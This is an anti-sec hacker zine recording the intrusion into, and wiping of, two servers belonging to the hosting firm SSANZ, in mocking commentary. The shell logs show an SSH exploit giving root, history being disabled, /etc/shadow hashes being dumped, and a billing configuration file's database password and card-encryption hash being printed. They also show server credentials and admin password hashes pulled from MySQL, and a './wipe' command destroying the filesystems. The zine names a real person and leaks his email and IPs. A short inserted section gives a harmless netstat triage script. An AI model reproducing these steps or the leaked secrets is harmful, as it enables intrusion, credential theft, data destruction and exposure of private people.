Zines/anti-sec/ssanz-pwned.txt

               __  .__
_____    _____/  |_|__|          ______ ____   ____
\__  \  /    \   __\  |  ______ /  ___// __ \_/ ___\
 / __ \|   |  \  | |  | /_____/ \___ \\  ___/\  \___
(____  /___|  /__| |__|        /____  >\___  >\___  >
     \/     \/                      \/      \/      \/
Some of you have seen a lot of casualties lately in the webhosting scene:
hosting companies being wiped and rm'd at the expense of their clients. While
some of this is collateral damage, we're about to show you, ladies and
gentlemen, that sometimes you aren't pwned because of who you host but what you
say.
Practice what you preach.
- Why SSANZ?
Owned by a kid who claims he can manage, secure and audit servers, he offers
a service that he clearly cannot provide. We are against that.
LoganNZ <http://www.webhostingtalk.com/member.php?u=56008>:
>>Logan of New Zealand. CEO of Server Systems Administration NZ.
>>
>> Signature:
>>Server Systems Administration NZ | SSANZ
>>Got Hacked? | 24/7/365 Remote Emergency Support | Specialist Server Management
>>Affordable Hosting :: Resellers, Shared & Dedicated Server Systems
Server Management $25 - Security & Hardening - $50 <http://www.webhostingtalk.com/showthread.php?t=857383>:
>>Server Management - $25 Per Month
>>
>>- Full Management - Support, & 3rd Party Installs
>>- Monitoring - Included - up to 3 ports.
>>- Emergency Recovery
>>Server Security - $50
>>
>>- Initial Scan & Report
>>- Security Hardening & Security Installs/tweaks.
>>- IDS, Security Monitoring & mod_sec configured.
>>- Finishing Security Scan & SSANZ Custom Scans.
>>
>>
>>Emergency Server Recovery - $150
>>
>>- Recover Hacked Server Systems
>>- Recover deleted data
>>- ANTI-dDOS Services
>>- dDOS Investigation
Security Worries? Security Audits - 50% OFF <http://www.webhostingtalk.com/showthread.php?t=859795>:
>>Get your site/server audited to ensure your business data is
>>secure before you become a statistic.
>>
>>In the past 6 months, e-crime activity reports have increased by
>>45% due to the global economic recession.
>>
>>What is involved in a Full Security Audit?
>>
>>External Security
>>
>> * Scan for Shells/malicious scripts
>> * Scan for vulnerable web content ( permissions, RFI's )
>> * Scans for Vulnerable Server Services
>> * Vulnerable Ports
>> * Testing of TCP handling - dDOS test.
>> * Scan for Vulnerable PHP scripts/mods.
>> * Control Panel Security Audit ( external )
>> * Multiple Unique SSANZ Custom Scans*
>>
>>
>>Internal Security
>>
>> * Permissions/Ownership(s) Review
>> * Apache/Webserver Security
>> * User Account Security & binaries access audit
>> * Local RFI Exploits located/patched.
>> * System Binary Security Audit
>> * Firewall/IPTABLES Audit
>> * Bruteforce detection test & audit
>> * Root Access Authentication Audit
>> * Local PHP Functions Audit
>> * Control Panel Security Audit ( Internal )
>> * Kernel Security Audit
>> * Additional SSANZ Custom Scans/Audit*
We at anti-sec decided to give you a _FREE_ Full Security Audit!*
* `rm -rf /` is included.
anti-sec:~/pwn# ./map ssanz.net
IP: 66.197.143.133 ( osiris.ssanz.net )
WWW: Apache/2.2.11
SSH: SSH-2.0-OpenSSH_4.3
IP: 66.197.204.101 ( devil.ssanz.net )
WWW: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 mod_mono/2.4 mod_auth_passthrough/2.1 mod_bwlimited/1.4
SSH: SSH-2.0-OpenSSH_4.3
anti-sec:~/pwn# cd xpl/
anti-sec:~/pwn/xpl# ./0pen0wn -h 66.197.143.133 -p 22
[+] 0wn0wn - anti-sec group
[+] Target: 66.197.143.133
[+] SSH Port: 22
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
sh-3.2# export HISTFILE=/dev/null
sh-3.2# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh-3.2# uname -a
Linux osiris.ssanz.net 2.6.24.5-grsec-hostnoc-4.0.0-x86_64-libata #1 SMP Mon Aug 25 15:56:12 EDT 2008 x86_64 x86_64 x86_64 GNU/Linux
sh-3.2# head -n1 /etc/shadow
root:$1$t4e0hufX$UH4Q5jTj93EEAODNrSaWO/:14412:0:99999:7:::
sh-3.2# w
03:43:43 up 7 days, 54 min, 1 user, load average: 9.01, 9.78, 10.73
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 125.238.144.224 20:17 7:26m 13:18 13:18 htop
sh-3.2# pwd
/root
sh-3.2# ls -la
total 3008
drwxr-x--- 24 root root 4096 Jul 4 03:43 .
drwxr-xr-x 27 root root 4096 Jun 27 02:49 ..
-rw------- 1 root root 957 Jun 13 07:24 .accesshash
-rw------- 1 root root 1012 Jun 1 10:39 anaconda-ks.cfg
-rw------- 1 root root 15460 Jul 3 23:38 .bash_history
-rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout
-rw-r--r-- 1 root root 191 Jan 6 2007 .bash_profile
-rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc
drwxrwxrwx 3 therockm therockm 4096 Jun 5 07:26 bwm-ng-0.6
-rw-r--r-- 1 root root 141564 Mar 1 2007 bwm-ng-0.6.tar.gz
drwxr-xr-x 3 root root 4096 Nov 15 2006 cmm
-rw-r--r-- 1 root root 18656 Feb 28 11:32 cmm.tgz
drwxr-xr-x 3 root root 4096 Nov 5 2006 cmq
-rw-r--r-- 1 root root 14507 Oct 10 2008 cmq.tgz
drwxr-xr-x 4 root root 4096 Jun 1 14:33 .cpanel
drwxr-xr-x 4 root root 4096 Jun 1 17:10 cpanel3-skel
drwx------ 3 root root 4096 Jun 1 13:50 .cpobjcache
drwxr-xr-x 10 root root 4096 Apr 13 16:17 csf
-rw-r--r-- 1 root root 430121 May 15 12:07 csf.tgz
-rw-r--r-- 1 root root 100 Jan 6 2007 .cshrc
drwx------ 2 root root 4096 Jun 1 13:54 .elinks
-rw-r--r-- 1 root root 1176672 Jul 4 03:40 error_log
-rw-r--r-- 1 root root 16 Jun 3 08:34 .forward
drwx------ 3 root root 4096 Jun 1 10:39 .gconf
drwx------ 2 root root 4096 Jun 1 10:39 .gconfd
drwxr-xr-x 4 root root 4096 Jun 10 23:42 .gem
drwx------ 2 root root 4096 Jun 1 13:55 .gnupg
drwxrwxrwx 5 theweath theweath 4096 Jun 1 17:13 htop-0.8.1
-rw-r--r-- 1 root root 414870 Sep 23 2008 htop-0.8.1.tar.gz
-rw-r--r-- 1 root root 561 Jun 27 02:48 .htoprc
-rw-r--r-- 1 root root 8144 Jun 6 19:23 index.html
-rw-r--r-- 1 root root 4246 Jun 1 10:39 install.log.syslog
drwxr-xr-x 6 500 root 4096 Sep 13 2005 iptraf-3.0.0
-rw-r--r-- 1 root root 0 Jun 27 09:21 iptraf-3.0.0.tar.gz
-rw-r--r-- 1 root root 0 Jun 27 09:22 iptraf-3.0.0.tar.gz.1
-rw-r--r-- 1 root root 0 Jun 27 09:24 iptraf-3.0.0.tar.gz.2
-rw-r--r-- 1 root root 575169 Jun 27 09:26 iptraf-3.0.0.tar.gz.3
drwx------ 6 root root 4096 Jun 1 14:21 .MirrorSearch
-rw------- 1 root root 61 Jun 12 21:04 .my.cnf
-rw------- 1 root root 139 Jul 3 10:51 .mysql_history
-rwxrwxrwx 1 root root 38688 Dec 1 2008 mysqltuner.pl
-rw-r--r-- 1 root root 264 Jul 2 21:43 .pearrc
drwxr-xr-x 2 root root 4096 Jun 1 17:04 public_ftp
drwxr-xr-x 3 root root 4096 Jun 1 17:04 public_html
-rw------- 1 root root 1024 Jun 7 19:50 .rnd
drwx------ 3 root root 4096 Jun 1 14:29 .spamassassin
drwx------ 2 root root 4096 Jun 2 06:41 .ssh
-rw-r--r-- 1 root root 129 Jan 6 2007 .tcshrc
drwxr-xr-x 3 root root 4096 Jun 7 21:54 tmp
-rw------- 1 root root 0 Jun 7 22:01 .trustwavereqs
drw------- 2 root root 4096 Jun 3 08:18 whmrbackups
drw------- 3 root root 4096 Jun 10 08:25 whmrcorebackups
sh-3.2# cat .bash_history
htop
htop
p
htop
tail -f /var/log/secure
tail -f /var/log/secure
[snip]
nano highperformance.conf
service httpd restart
nano highperformance.conf
service httpd restart
nano highperformance.conf
nano httpd.conf
nano php.conf
ls
nano modsec2.conf
ls
[snip]
nano visit4cash.net.conf
cd ..
[snip]
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
ps -aux|grep -i HTTP|wc -l
w
bwm-ng
[snip]
netstat -plan|grep :80|awk {.print $5.}|cut -d: -f 1|sort|uniq -c|sort -n
netstat -plan|grep :80| awk {.print $5.} |cut -d: -f 1|sort|uniq -c|sort -n
netstat -plan|grep :80| awk {.print $5.} |cut -d: -f 1|sort|uniq -c|sort -n
netstat -ntu | awk .{print $5}. | cut -d: -f1 | sort | uniq -c | sort -n
netstat -an | awk '{print $4}' | awk -F":" '{print $2}' | sort -n -u
netstat -nat | awk '{print $6}' | sort | uniq -c | sort -n
netstat -nat |grep 202.54.1.10 | awk '{print $6}' | sort | uniq -c | sort -n
netstat -atun | awk '{print $5}' | cut -d: -f1 | sed -e '/^$/d' |sort | uniq -c | sort -n
[snip]
/sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags ALL ACK,RST,SYN,FIN -j DROP
/sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP
/sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags SYN,RST SYN,RST -j DROP
[snip]
service cups stop
chkconfig cups off
service nfslock stop
chkconfig nfslock off
service rpcidmapd stop
chkconfig rpcidmapd off
service bluetooth stop
chkconfig bluetooth off
service anacron stop
chkconfig anacron off
service avahi-daemon stop
chkconfig avahi-daemon off
service hidd stop
chkconfig hidd off
service pcscd stop
chkconfig pcscd off
[snip]
http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-iso
screen wget http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-iso
htop
screen wget http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-beta-iso
[snip]
wget http://fullhide.info/backup-6.24.2009_18-13-16_fullhide.tar.gz
htop
[snip]
wget ftp://iptraf.seul.org/pub/iptraf/iptraf-3.0.0.tar.gz
wget ftp://the.wiretapped.net/pub/security/network-monitoring/iptraf/iptraf-3.0.00.tar.gz
[snip]
wget http://www.logview.org/logview-install
chmod +x logview-install
./logview-install
rm -rf logview-install
sh-3.2# grep sec /etc/userdomains
affiliatesecrets.wecloak.info: wecloaki
infosecawareness.info: andlyssa
secproxy.info: secproxy
infosecawareness.andly.ssanz.net: andlyssa
greycloud.nakedinsects.com: greyclou
serversecuritynz.com: forumz
orac.nakedinsects.com: oracnz
infernal.nakedinsects.com: infernal
nakedinsects.com: ni
fluffy.nakedinsects.com: fluffy
quickclix.orac.nakedinsects.com: oracnz
seco39.ssanz.net: secossan
sh-3.2# lastlog | grep -v Never
Username Port From Latest
root pts/1 125.238.144.224 Fri Jul 3 20:27:03 -0400 2009
simmobim pts/0 118.69.80.114 Fri Jun 12 00:22:04 -0400 2009
mattss pts/1 118.90.48.0 Sun Jun 21 04:44:58 -0400 2009
etasmtco pts/0 189.31.24.129 Sat Jun 20 10:14:51 -0400 2009
sh-3.2# cd ~billing
sh-3.2# ls -la
total 301252
drwx--x--x 15 billing billing 4096 Jun 28 02:08 .
drwx--x--x 737 root root 20480 Jul 4 00:37 ..
lrwxrwxrwx 1 billing billing 33 Jun 2 01:58 access-logs -> /usr/local/apache/domlogs/billing
-rw------- 1 billing billing 87744924 Jun 14 12:33 backup-6.14.2009_12-32-41_billing.tar.gz
-rw------- 1 billing billing 92931478 Jun 28 02:08 backup-6.28.2009_02-06-29_billing.tar.gz
-rw------- 1 billing billing 84475934 Jun 3 06:33 backup-6.3.2009_06-32-54_billing.tar.gz
-rw------- 1 billing billing 42341015 May 31 21:42 backup-billing9912.tar.gz
-rw-r--r-- 1 billing billing 24 May 27 2008 .bash_logout
-rw-r--r-- 1 billing billing 176 May 27 2008 .bash_profile
-rw-r--r-- 1 billing billing 124 May 27 2008 .bashrc
-rw------- 1 billing billing 17 May 27 2008 .contactemail
drwxr-xr-x 5 billing billing 4096 May 8 02:48 .cpanel
-rw-r----- 1 billing billing 0 Apr 4 06:32 cpbackup-exclude.conf
drwxr-xr-x 2 billing billing 4096 Jun 2 01:57 cpmove.psql
drwxr-xr-x 3 billing billing 4096 Nov 12 2008 cpmove.psql.1240007789
drwxr-xr-x 2 billing billing 4096 Apr 16 23:24 cpmove.psql.1243922290
-rw-r--r-- 1 billing billing 532304 Jul 4 03:45 error_log
drwxr-x--- 4 billing mail 4096 Jan 19 21:39 etc
drwxr-x--- 2 billing nobody 4096 May 27 2008 .htpasswds
-rw-r--r-- 1 billing billing 7 Nov 12 2008 .lang
-rw------- 1 billing billing 15 Jun 28 02:07 .lastlogin
drwxrwx--- 10 billing billing 4096 Jul 2 21:43 mail
drwxr-xr-x 4 billing billing 4096 Nov 12 2008 .mozilla
drwxr-xr-x 3 billing billing 4096 Apr 29 2008 public_ftp
drwxr-x--- 24 billing nobody 4096 Jun 28 02:55 public_html
drwx------ 4 billing billing 4096 Jun 7 21:53 ssl
drwxr-xr-x 7 billing billing 4096 Feb 25 17:59 tmp
drwx------ 2 billing billing 4096 May 27 2008 .trash
lrwxrwxrwx 1 billing billing 11 Jun 2 01:58 www -> public_html
-rw-r--r-- 1 billing billing 658 May 27 2008 .zshrc
sh-3.2# cd www/
sh-3.2# ls
admin banned.php configuressl.php domainchecker.php init.php logout.php postinfo.html templates viewticket.php whois.php
affiliates.php billing contact.php downloads installmingchowping modules _private templates_c _vti_bin
aff.php cart.php creditcard.php downloads.php knowledgebase.php networkissues.php register.php tutorials.php _vti_cnf
announcements.php cgi-bin dbconnect.php htaccess.txt lang networkissuesrss.php serverstatus.php upgrade _vti_inf.html
announcementsrss.php clientarea.php display.php images libs order.php status upgrade.php _vti_log
announcements.xml configuration.php dl.php includes link.php passwordreminder.php submitticket.php viewemail.php _vti_pvt
attachments configuration.php.new dologin.php index.php login.php pipe supporttickets.php viewinvoice.php _vti_txt
sh-3.2# cat configuration.php
<?php
$license="93881365561d";
$db_host = "localhost";
$db_username = "billing_billusr";
$db_password = "X2qL6:qWCCb6";
$db_name = "billing_billing";
$cc_encryption_hash = "57jR9sVyPKcDvZ4Ppy4I56sjYLI6mmEjhPQJ1sEAqBw7O952JlkTlrAbzLLmTx9K";
$templates_compiledir = "templates_c/";
?>
sh-3.2# mysql
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 11021136
Server version: 5.0.81-community MySQL Community Edition (GPL)
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> use billing_billing;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+----------------------------+
| Tables_in_billing_billing |
+----------------------------+
| mod_ipmanager |
| mod_ipmonitor |
| tblaccounts |
| tblactivitylog |
| tbladdons |
| tbladminlog |
| tbladminperms |
| tbladminroles |
| tbladmins |
| tbladminsecurityquestions |
| tblaffiliates |
| tblaffiliatesaccounts |
| tblaffiliateshistory |
| tblaffiliatespending |
| tblaffiliateswithdrawals |
| tblannouncements |
| tblbannedemails |
| tblbannedips |
| tblbillableitems |
| tblbrowserlinks |
| tblcalendar |
| tblcancelrequests |
| tblclientgroups |
| tblclients |
| tblconfiguration |
| tblcontacts |
| tblcredit |
| tblcurrencies |
| tblcustomfields |
| tblcustomfieldsvalues |
| tbldomainpricing |
| tbldomains |
| tbldomainsadditionalfields |
| tbldownloadcats |
| tbldownloads |
| tblemails |
| tblemailtemplates |
| tblfraud |
| tblgatewaylog |
| tblhosting |
| tblhostingaddons |
| tblhostingconfigoptions |
| tblinvoiceitems |
| tblinvoices |
| tblknowledgebase |
| tblknowledgebasecats |
| tblknowledgebaselinks |
| tbllinks |
| tblnetworkissues |
| tblnotes |
| tblorders |
| tblpaymentgateways |
| tblpricing |
| tblproductconfiggroups |
| tblproductconfiglinks |
| tblproductconfigoptions |
| tblproductconfigoptionssub |
| tblproductgroups |
| tblproducts |
| tblpromotions |
| tblquoteitems |
| tblquotes |
| tblregistrars |
| tblservers |
| tblsslorders |
| tbltax |
| tblticketbreaklines |
| tblticketdepartments |
| tblticketescalations |
| tblticketlog |
| tblticketmaillog |
| tblticketnotes |
| tblticketpredefinedcats |
| tblticketpredefinedreplies |
| tblticketreplies |
| tbltickets |
| tblticketspamfilters |
| tbltodolist |
| tblupgrades |
| tblwhoislog |
+----------------------------+
80 rows in set (0.00 sec)
mysql> select name,ipaddress,hostname,username,password from tblservers;
+--------------+----------------+------------------+----------+--------------------------------------------------------------------------+
| name | ipaddress | hostname | username | password |
+--------------+----------------+------------------+----------+--------------------------------------------------------------------------+
| Osiris | 66.197.143.133 | Osiris.ssanz.net | ssanz | J4WILwNJpxR0KhyuPspLOT37zLzLrZ1wyqctabXg3co= |
| Osiris-Radio | 66.197.143.133 | Osiris.ssanz.net | root | +V876e3z7tGn9HXEcOG1TJVPaSsGbj31MnsZ2lw52buNutqcpfBhrPVsKdDssqrh7eDF8g== |
| Devil | 66.197.204.101 | devil.ssanz.net | root | n/a/WSvQJp/++la5CREbl9QijpppzdxP0GjijQRXst2nag9E9PuTVrRO3A== |
+--------------+----------------+------------------+----------+--------------------------------------------------------------------------+
3 rows in set (0.00 sec)
mysql> select firstname,lastname,email,username,password from tbladmins;
+-----------+----------+-----------------+----------+----------------------------------+
| firstname | lastname | email | username | password |
+-----------+----------+-----------------+----------+----------------------------------+
| Logan | Douglas | Logan@ssanz.net | Admin | c6df529826cf16ac5bedb424d8ac972b |
+-----------+----------+-----------------+----------+----------------------------------+
1 row in set (0.06 sec)
mysql> quit
Bye
sh-3.2# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda5 2.0G 477M 1.4G 26% /
/dev/sda8 875G 147G 684G 18% /home
/dev/sda3 9.7G 6.8G 2.5G 74% /usr
/dev/sda2 9.7G 7.0G 2.3G 76% /var
/dev/sda1 99M 23M 72M 24% /boot
/dev/sda6 996M 64M 881M 7% /tmp
tmpfs 3.9G 0 3.9G 0% /dev/shm
/dev/sdb1 459G 163G 273G 38% /backup
sh-3.2# ./wipe
sh-3.2# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda5 64Z 64Z 1.5G 100% /
/dev/sda8 64Z 64Z 729G 100% /home
/dev/sda3 64Z 64Z 3.0G 100% /usr
/dev/sda2 64Z 64Z 3.0G 100% /var
/dev/sda1 16Z 16Z 0 100% /boot
/dev/sda6 64Z 64Z 933M 100% /tmp
tmpfs 3.9G 0 3.9G 0% /dev/shm
/dev/sdb1 64Z 64Z 296G 100% /backup
sh-3.2# exit
exit
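The .bash_history dumped above shows the operator pasting the same
connections-per-peer netstat one-liner three times with broken quotes
({.print $5.}) before getting a working version, and on the second box
feeding the result into csf -d by hand, one IP at a time. Here is that triage
step done properly, as an added example written for this page (it is not the
zine's or SSANZ's code). The netstat lines in SAMPLE are constructed for the
example; the IP addresses reuse ones that appear on this page but the
connection states and ports are made up. Real use is `netstat -ntu | count_peers`.

```shell
#!/bin/sh
# Added example, not from the zine: per-peer connection counting from
# `netstat -ntu` output, the thing the operator kept retrying in his history.

# Read netstat output on stdin, print "<count> <peer address>" sorted ascending.
# Only rows whose first field starts with tcp/udp are counted, so the two
# header lines netstat prints are skipped without a separate grep. The port is
# removed by stripping the last ":NNN" (or ":*"), which also leaves IPv6
# foreign addresses intact instead of cutting them at the first colon as
# `cut -d: -f1` does.
count_peers() {
    awk '$1 ~ /^(tcp|udp)/ { sub(/:[0-9*]+$/, "", $5); n[$5]++ }
         END { for (a in n) print n[a], a }' | sort -n
}

# Print peers with more than $1 connections, one per line, e.g. to feed
# `csf -d` or an iptables DROP rule. Usage: netstat -ntu | flag_floods 50
flag_floods() {
    count_peers | awk -v t="$1" '$1 > t { print $2 }'
}

# Constructed sample netstat output (not captured from any real host).
SAMPLE='Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 66.197.143.133:80       89.165.50.38:51211      SYN_RECV
tcp        0      0 66.197.143.133:80       89.165.50.38:51212      SYN_RECV
tcp        0      0 66.197.143.133:80       89.165.50.38:51213      SYN_RECV
tcp        0      0 66.197.143.133:22       125.238.144.224:4120    ESTABLISHED
tcp        0      0 66.197.143.133:80       202.54.1.10:3301        ESTABLISHED
udp        0      0 66.197.143.133:53       202.54.1.10:53          ESTABLISHED'

# Helpers that run the functions over the sample, so the results can be
# checked without a live netstat.
sample_top_talker() {
    printf '%s\n' "$SAMPLE" | count_peers | tail -n 1
}

sample_floods() {
    printf '%s\n' "$SAMPLE" | flag_floods "$1"
}

# Demo when run directly: ./peers.sh --demo
if [ "${1:-}" = "--demo" ]; then
    printf '%s\n' "$SAMPLE" | count_peers
fi
```

Note that a raw per-address count is a triage aid, not a verdict: a NAT
gateway or a proxy in front of many legitimate users will sit at the top of
this list too, so check what the connections are (SYN_RECV piles versus
established sessions) before blocking, rather than looping `csf -d` on
whatever is on top.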
-----------------------------------
osiris [ DOWN ]
devil [ UP ]
-----------------------------------
anti-sec:~/pwn/xpl# ./0pen0wn -h 66.197.204.101 -p 22
[+] 0wn0wn - anti-sec group
[+] Target: 66.197.204.101
[+] SSH Port: 22
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
sh-3.2# export HISTFILE=/dev/null
sh-3.2# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh-3.2# uname -a
Linux devil.ssanz.net 2.6.24.5-grsec-hostnoc-4.0.0-x86_64-libata #1 SMP Mon Aug 25 15:56:12 EDT 2008 x86_64 x86_64 x86_64 GNU/Linux
sh-3.2# head -n1 /etc/shadow
root:$1$BitobdhB$SAscpWG4O51UZQzxpBxbI1:14407:0:99999:7:::
sh-3.2# w
04:10:20 up 4 days, 12:11, 1 user, load average: 3.25, 2.09, 1.68
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 125.238.144.224 20:18 7:51m 6:38 6:38 htop
sh-3.2# pwd
/root
sh-3.2# ls -la
total 1232
drwxr-x--- 23 root root 4096 Jul 4 04:06 .
drwxr-xr-x 25 root root 4096 Jun 29 14:33 ..
-rw------- 1 root root 957 Jun 13 05:20 .accesshash
-rw------- 1 root root 937 Jun 12 00:01 anaconda-ks.cfg
-rw------- 1 root root 7258 Jun 30 10:03 .bash_history
-rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout
-rw-r--r-- 1 root root 191 Jan 6 2007 .bash_profile
-rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc
drwxrwxrwx 3 1000 1000 4096 Jun 12 04:45 bwm-ng-0.6
-rw-r--r-- 1 root root 141564 Mar 1 2007 bwm-ng-0.6.tar.gz
drwxr-xr-x 3 root root 4096 Nov 5 2006 cmq
-rw-r--r-- 1 root root 14507 Oct 10 2008 cmq.tgz
drwxr-xr-x 4 root root 4096 Jun 12 02:51 .cpanel
drwxr-xr-x 4 root root 4096 Jun 12 03:26 cpanel3-skel
drwx------ 3 root root 4096 Jun 12 00:17 .cpobjcache
drwxr-xr-x 2 root root 4096 Aug 21 2006 cse
-rw-r--r-- 1 root root 12207 Oct 10 2008 cse.tgz
drwxr-xr-x 10 root root 4096 Jun 5 05:05 csf
-rw-r--r-- 1 root root 431490 Jun 5 10:52 csf.tgz
-rw-r--r-- 1 root root 100 Jan 6 2007 .cshrc
drwx------ 2 root root 4096 Jun 12 01:51 .elinks
-rw-r--r-- 1 root root 16 Jun 13 15:33 .forward
drwx------ 3 root root 4096 Jun 11 23:59 .gconf
drwx------ 2 root root 4096 Jun 11 23:59 .gconfd
drwxr-xr-x 4 root root 4096 Jun 12 04:29 .gem
drwx------ 2 root root 4096 Jun 12 01:53 .gnupg
drwxrwxrwx 6 1002 1002 4096 Jun 12 04:24 htop-0.8.1
-rw-r--r-- 1 root root 414870 Sep 23 2008 htop-0.8.1.tar.gz
-rw-r--r-- 1 root root 561 Jun 12 23:31 .htoprc
-rw-r--r-- 1 root root 4239 Jun 12 00:01 install.log.syslog
drwx------ 6 root root 4096 Jun 12 02:33 .MirrorSearch
-rw------- 1 root root 37 Jun 12 02:11 .my.cnf
drwxr-xr-x 3 1000 1000 4096 Jun 12 05:42 mytop-1.6
-rw-r--r-- 1 root root 19720 Feb 16 2007 mytop-1.6.tar.gz
-rw-r--r-- 1 root root 264 Jun 23 00:23 .pearrc
drwxr-xr-x 2 root root 4096 Jun 12 03:21 public_ftp
drwxr-xr-x 3 root root 4096 Jun 12 03:21 public_html
-rw------- 1 root root 1024 Jun 12 02:50 .rnd
drwx------ 3 root root 4096 Jun 12 02:41 .spamassassin
drwx------ 2 root root 4096 Jun 22 09:11 .ssh
-rw-r--r-- 1 root root 129 Jan 6 2007 .tcshrc
drwxr-xr-x 3 root root 4096 Jun 12 02:40 tmp
drwxr-xr-x 2 root root 4096 Jun 16 19:23 .wapi
sh-3.2# cat .bash_history
sh hninst.sh
passwd
fdisk -l
exit
w
history
screen -ls
screen -r 2785.pts-0.devil
exit
wget http://merovingian.net.nz/htop-0.8.1.tar.gz
[snip]
csf -a 125.238.144.110
exit
cd /home
ls
wget http://visit4cash.net/backup-6.12.2009_06-46-12_visit4ca.tar.gz
[snip]
wget http://visit4cash.net/mainfiles.tar.gz
mv mainfiles.tar.gz /home/visit4ca/public_html
cd /home
cd visit4ca
cd public_html
ls
tar zxvf mainfiles.tar.gz
[snip]
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.38.206.233
csf --restart
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 118.94.59.33
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
[snip]
screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Live/i686/Fedora-11-i686-Live.iso
screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Fedora/x86_64/iso/Fedora-11-x86_64-DVD.iso
screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Fedora/x86_64/iso/Fedora-11-x86_64-netinst.iso
sh-3.2# cat /etc/userdomains
advertising.ssanz.net: adserver
forums.visit4cash.net: forumsv4
megacashzone.com: megacash
visit4cash.net: visit4ca
seanone.com: seanonec
backup2.ssanz.net: backup2
*: nobody
sh-3.2# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda3 31G 7.5G 22G 26% /
/dev/sdb1 452G 35G 394G 9% /home
/dev/sda1 99M 23M 72M 24% /boot
tmpfs 495M 4.0K 495M 1% /dev/shm
/usr/tmpDSK 485M 14M 446M 3% /tmp
sh-3.2# who
root pts/0 2009-07-03 20:18 (125.238.144.224)
sh-3.2# ./wipe
sh-3.2# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda3 64Z 64Z 24G 100% /
/dev/sdb1 64Z 64Z 417G 100% /home
/dev/sda1 16Z 16Z 77M 100% /boot
tmpfs 495M 4.0K 495M 1% /dev/shm
/usr/tmpDSK 485M 14M 446M 3% /tmp
sh-3.2# exit
exit
-----------------------------------
osiris [ DOWN ]
devil [ DOWN ]
-----------------------------------
Once again, practice what you preach. Don't claim to be something you're not.
Most importantly, don't go after us. We're not the problem. What you say does
not align AT ALL with what you actually do with your servers.
Fix that first, you dig?
~ There will always be no way out.